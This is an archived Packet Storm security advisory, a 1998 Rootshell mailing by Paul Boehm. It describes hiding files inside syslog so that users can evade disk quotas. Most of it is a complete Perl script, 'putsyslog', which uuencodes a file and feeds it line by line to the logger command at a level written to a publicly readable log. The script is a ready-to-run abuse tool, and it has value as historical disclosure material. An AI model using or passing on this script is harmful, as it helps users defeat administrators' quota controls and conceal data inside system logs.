putsyslog.txt

1999-08-17T00:00:00
ID PACKETSTORM:15278
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `  
[ http://www.rootshell.com/ ]  
  
From paul@boehm.org Wed Jul 8 10:18:27 1998  
Date: Wed, 8 Jul 1998 19:08:41 +0200  
From: Paul Boehm <paul@boehm.org>  
To: www-request@rootshell.com  
Subject: putsyslog  
  
hi,  
  
users can write messages to syslog and thus hide files in there and  
bypass quotas.. later they can extract it if they have read access  
to the logfile. i already wrote a perl script that puts an uuencoded   
file in syslog... but now im too lazy to write a script/program to   
extract it.. anyway, here's putsyslog:  
  
--snip--  
#!/usr/bin/perl  
#Putsyslog - puts a file in syslog using logger and uuencode  
# maybe i'll write a getsyslog someday.. but rather not  
#  
# infected@cia.at  
  
$file = shift || "file";  
$loglevel = shift || "daemon.info"; # something that goes  
# to a pub readable  
# logfile  
open(UU,"uuencode $file $file |");  
  
while (<UU>) {  
chomp;  
s/\\/\\\\/g;  
s/\"/\\"/g;  
s/\'/\\'/g;  
s/\`/\\`/g;  
system("logger -p $loglevel \"[PUTFILE] $file $_\"\n");  
}  
  
close(UU);  
  
print "done logging $file to $loglevel\n";  
--snip--  
  
--   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
Name: Paul S. Boehm || Freelance Security Consultant.  
Email: paul@is.destructive.org || PGPkey available at:  
Url: http://paul.boehm.org/ || http://paul.boehm.org/paul-pgp.asc  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
There is is no reason for any individual to have a computer in their home.  
--Ken Olsen (Digital Corp CEO) 1977.  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
`